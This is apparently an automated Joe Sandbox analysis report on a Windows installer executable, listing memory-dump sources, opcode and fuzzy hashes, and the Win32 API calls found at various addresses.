• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• API String ID: 3585118688-0
• Opcode ID: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
• Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
• Opcode Fuzzy Hash: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
• Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
APIs
• IsWindowVisible.USER32(?), ref: 00405137
• CallWindowProcW.USER32(?,?,?,?), ref: 00405188
  • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
• Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
• CloseHandle.KERNEL32(?), ref: 00405697
Strings
• Error launching installer, xrefs: 00405678
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                                  • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                                  • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
                                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00403347
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 4115351271-3144792594
                                                                                                                                                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                                  • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                                                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                                  • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                                  • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                                  • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                                  • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                                  • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                                  • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                                  • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                                  • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                                  • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                                  • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                                  • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                                  • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                                  • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
• Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
• Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
• Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
• Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
• Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
• Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
• Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
• Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
• Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
• Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
• Opcode Fuzzy Hash: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
• Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401B92
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call
• API String ID: 3394109436-1824292864
• Opcode ID: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
• Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
• Opcode Fuzzy Hash: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
• Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
APIs
  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
• Opcode ID: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
• Instruction ID: d1cba53e09d25e0e4976289683f2ac1bdc9fdbf0613ee45d63c2eeb4b4bf5101
• Opcode Fuzzy Hash: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
• Instruction Fuzzy Hash: 8AF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D2B85D41DB2A
APIs
Memory Dump Source
• Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_________.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
• Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
• Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
• Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
APIs
  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3677997916-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
• RegCloseKey.ADVAPI32(00000000), ref: 004022FD
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                  • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                                  • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                                  • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                                  • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                                  Memory Dump Source
